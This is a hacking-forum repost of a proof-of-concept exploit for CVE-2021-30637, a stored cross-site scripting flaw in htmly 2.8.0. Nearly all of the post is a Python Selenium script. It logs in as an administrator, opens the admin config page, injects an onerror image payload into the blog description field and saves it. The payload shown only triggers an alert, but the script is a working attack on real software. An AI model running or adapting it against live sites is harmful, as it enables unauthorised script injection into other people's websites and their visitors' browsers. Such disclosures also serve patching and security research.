Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)

 Share


HACK1949

Recommended Posts

# Exploit Title: htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)
# Authors: @nu11secur1ty & G.Dzhankushev
# Date: 04.15.2021
# Vendor Homepage: https://www.htmly.com/
# Software Link: https://github.com/danpros/htmly
# CVE: CVE-2021-30637

#!/usr/bin/python3

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time


#enter the link to the website you want to automate login.
website_link="http://localhost/htmly/login"

#enter your login username
username="nu11secur1ty"

#enter your login password
password="password"

#enter the element for username input field
element_for_username="user"
#enter the element for password input field
element_for_password="password"
#enter the element for submit button
element_for_submit="submit"


#browser = webdriver.Safari()	#for macOS users[for others use chrome vis chromedriver]
browser = webdriver.Chrome()	#uncomment this line,for chrome users
#browser = webdriver.Firefox()	#uncomment this line,for chrome users

browser.get((website_link))	

try:
	username_element = browser.find_element_by_name(element_for_username)
	username_element.send_keys(username)		
	password_element  = browser.find_element_by_name(element_for_password)
	password_element.send_keys(password)
	signInButton = browser.find_element_by_name(element_for_submit)
	signInButton.click()
	
	# Exploit .ini
	browser.get(("http://localhost/htmly/admin/config"))	
	browser.execute_script("document.querySelector('[name=\"-config-blog.description\"]').innerText = '</span><img src=1 onerror=alert(1) /><span>'") 
	time.sleep(3)
	browser.execute_script("document.querySelector('.btn.btn-primary').click()")

	print("payload is deployed...\n")
	
except Exception:
	#### This exception occurs if the element are not found in the webpage.
	print("Some error occured :(")
            
Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...